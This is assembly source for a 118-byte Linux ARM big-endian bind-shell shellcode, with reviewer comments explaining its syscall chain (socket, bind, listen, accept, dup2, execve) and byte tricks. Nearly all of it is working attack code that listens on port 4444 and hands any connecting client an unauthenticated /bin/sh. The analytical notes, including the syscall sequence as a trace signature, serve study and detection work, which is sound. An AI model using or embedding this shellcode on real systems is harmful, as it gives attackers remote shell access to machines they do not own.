/*

Linux Arm Big Endian bind_tcp ipv4 shellcode, 118 bytes

Balazs Bucsay

@xoreipeip | earthquake <at@> rycon <do.t> hu

http://rycon.hu

port = 4444

ip = 0.0.0.0

*/

/*
 Reading notes (added on review, for anyone analysing this blob):

   - Execution starts in ARM state and switches to Thumb after the first two
     instructions; disassemble `.code 32` as ARM and everything after
     `.code 16` as Thumb, or the listing will not make sense.
   - ARM EABI: the syscall number is passed in r7, the `svc` immediate is not
     the number.  Call sequence, in order: socket(281) -> bind(282) ->
     listen(284) -> accept(285) -> dup2(63) x3 -> execve(11) -> exit(1).
     That is the textbook bind-shell pattern: a listening TCP socket on
     0.0.0.0:4444 whose accepted connection becomes stdin/stdout/stderr of
     /bin/sh.  The syscall chain itself is the behavioural signature to
     look for in traces.
   - Registers are zeroed with `sub rX, rX, rX` rather than `mov rX, #0`,
     presumably to keep 0x00 bytes out of the instruction encoding.
   - The sockaddr_in is written above the current sp without adjusting it,
     so whatever the hosting process kept there is overwritten.
   - The "118 bytes" in the header appears to count the unterminated
     `.ascii "//bin/sh"` variant commented out at the bottom; with the
     explicit `\0` the blob is one byte longer (8 bytes ARM + 102 bytes
     Thumb + string).
   - Big-endian only: the word assembled in r2 for bind() lays out as
     sin_family / sin_port in the right order solely because the store is
     big-endian.
*/

.section .text

.global _start

_start:

.code 32                                /* ARM state on entry */

# Thumb-Mode on

add r6, pc, #1                          /* in ARM state pc reads this insn + 8, i.e. the first Thumb insn; bit0 = 1 requests Thumb */

bx r6                                   /* branch there and switch to Thumb */

.code 16                                /* everything from here is 16-bit Thumb */

# _socket(2,1,0)

sub r2, r2, r2                          /* r2 = 0          -> protocol */

add r1, r2, #1                          /* r1 = 1          -> SOCK_STREAM */

add r0, r2, #2                          /* r0 = 2          -> AF_INET */

lsl r7, r1, #8                          /* r7 = 0x100 */

add r7, r7, #0x19                       /* r7 = 0x119 = 281 -> socket */

svc 1                                   /* socket(AF_INET, SOCK_STREAM, 0); immediate is ignored under EABI */

mov r6, r0                              /* r6 = listening socket fd (r0 keeps it too) */

/*

1 uint8_t sin_len

1 sa_family_t sin_family

2 in_port_t sin_port

4 struct in_addr sin_addr

8 char sin_zero [8]

00 02 5C11 00000000 00000000 00000000

5c11 => 4444

Review note: the field list above is the BSD layout; on Linux there is no
sin_len and sin_family is a 16-bit field.  The word built in r2 below is
0x0002115C, which a big-endian store lays out as bytes 00 02 11 5C:
sin_family = 0x0002 (AF_INET), sin_port = 0x115C = 4444 already in network
byte order.  The "5C11" in the dump is the same value with its two bytes
written in the reverse order.

*/

# _bind()

mov r2, #2                              /* r2 = 0x00000002 */

lsl r2, r2, #8                          /* r2 = 0x00000200 */

add r2, r2, #0x11                       /* r2 = 0x00000211 */

lsl r2, r2, #8                          /* r2 = 0x00021100 */

add r2, r2, #0x5C                       /* r2 = 0x0002115C = {sin_family=2, sin_port=htons(4444)} */

sub r3, r3, r3                          /* r3 = 0 -> sin_addr = 0.0.0.0 (INADDR_ANY) */

sub r4, r4, r4                          /* r4 = 0 -> sin_zero[0..3] */

sub r5, r5, r5                          /* r5 = 0 -> sin_zero[4..7] */

mov r1, sp                              /* build the struct at [sp] (no stack space reserved) */

stm r1!, {r2-r5}                        /* store the 16-byte sockaddr_in; r1 = sp + 16 afterwards */

sub r1, #0x10                           /* r1 = sp -> pointer to the struct */

mov r2, #16                             /* r2 = sizeof(struct sockaddr_in) */

add r7, r7, #1                          /* r7 = 282 -> bind */

svc 1                                   /* bind(r0 = listening fd still from socket(), &sockaddr, 16) */

# _listen()

mov r0, r6                              /* r0 = listening fd */

sub r1, r1, r1                          /* r1 = 0 -> backlog */

add r7, r7, #2                          /* r7 = 284 -> listen (283 is connect, skipped) */

svc 1                                   /* listen(fd, 0) */

# _accept()

mov r0, r6                              /* r0 = listening fd */

sub r2, r2, r2                          /* r2 = 0 -> addrlen = NULL; r1 is still 0 from above -> addr = NULL */

add r7, r7, #1                          /* r7 = 285 -> accept */

svc 1                                   /* accept(fd, NULL, NULL) blocks until a client connects */

mov r6, r0                              /* r6 = accepted connection fd; the listening fd is dropped, never closed */

# _dup2()

sub r1, r1, r1                          /* r1 = 0 -> stdin; r0 is still the accepted fd */

mov r7, #63                             /* r7 = 63 -> dup2 */

svc 1                                   /* dup2(client, 0) */

mov r0, r6                              /* r0 = client fd again (svc clobbered it with the return value) */

add r1, r1, #1                          /* r1 = 1 -> stdout */

svc 1                                   /* dup2(client, 1) */

mov r0, r6

add r1, r1, #1                          /* r1 = 2 -> stderr */

svc 1                                   /* dup2(client, 2) */

# _execve()

sub r2, r2, r2                          /* r2 = 0 -> envp = NULL */

mov r0, pc                              /* in Thumb state pc reads this insn + 4 */

add r0, #18                             /* + 18 = the remaining 20 bytes of code minus the 2 already skipped -> r0 = &"//bin/sh" */

// next instruction terminates the string beneath the code "//bin/sh"

// in case you want to say goodbye to the null character

// str r2, [r0, #8]

str r2, [sp, #8]                        /* argv[1] = NULL            (overwrites part of the no-longer-needed sockaddr) */

str r0, [sp, #4]                        /* argv[0] = "//bin/sh" */

add r1, sp, #4                          /* r1 = argv */

mov r7, #11                             /* r7 = 11 -> execve */

svc 1                                   /* execve("//bin/sh", argv, NULL); only returns on failure */

# _exit()

sub r4, r4, r4                          /* r4 = 0 */

mov r0, r4                              /* r0 = 0 -> exit status */

mov r7, #1                              /* r7 = 1 -> exit */

svc 1                                   /* exit(0) if execve failed */

.ascii "//bin/sh\0"                     /* path reached via pc + 18 above; the leading "//" keeps the length at 8 */

//.ascii "//bin/sh"